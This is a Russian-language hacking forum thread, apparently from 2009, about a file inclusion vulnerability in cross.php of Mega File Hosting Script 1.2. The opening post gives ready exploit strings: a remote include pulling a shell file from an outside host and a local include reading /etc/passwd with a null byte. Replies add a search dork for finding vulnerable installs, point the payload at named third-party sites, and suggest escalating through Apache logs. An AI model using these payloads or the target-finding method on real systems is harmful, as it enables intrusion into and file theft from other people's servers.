![]() |
Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
удаленный / локальный файл включения
для 1.2 версий :) ############################################# # Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability # # Home: # # Www.hacking.ge # ############################################# ############################################# Просто помимо этого Exploit и наслаждайтесь # ############################################# RFI: /cross.php?url=http://site.ru/shell.txt LFI: /cross.php?url=../../../../../../../../etc/passwd%00 ############################################# # Author: Garry /// 25/02/2009 # # ############################################# |
А Дорк?
|
Мде...........
|
с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например |
Дорк на Mega file hosting сайта:
"Powered by: MFH " :) |
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif
& и локальный файл включения в Linux-сервер: cross.php?url=../../../../../../../../etc/passwd%00 :) |
Это код из cross.php
PHP код:
|
Цитата:
UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных |
jokester
Да, это ошибка основана на меня |
Цитата:
|
эксплуатировать эту работает хорошо на локальный файл включения
http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00 Не взломать этот сайт!!! |
Powered by: MFH v1.2 катит
Powered by: MFH v2.0 не катит |
jokester
Основателем этого является ошибка: garry it's Me :) kysmi4 da это правда |
Цитата:
1) Через логи апача 2) Найти реальный путь и читать файлы в поисках |
А зачем тогда писать для все версий?
|
kyzmi4
sorry it's my error! http://milw0rm.com/exploits/8230 :) |
Цитата:
|
Цитата:
кому интересно http://depositfiles.com/ru/files/qq80v50yg/ Mega_File_Hosting_Script_v1.1 |
| Время: 14:31 |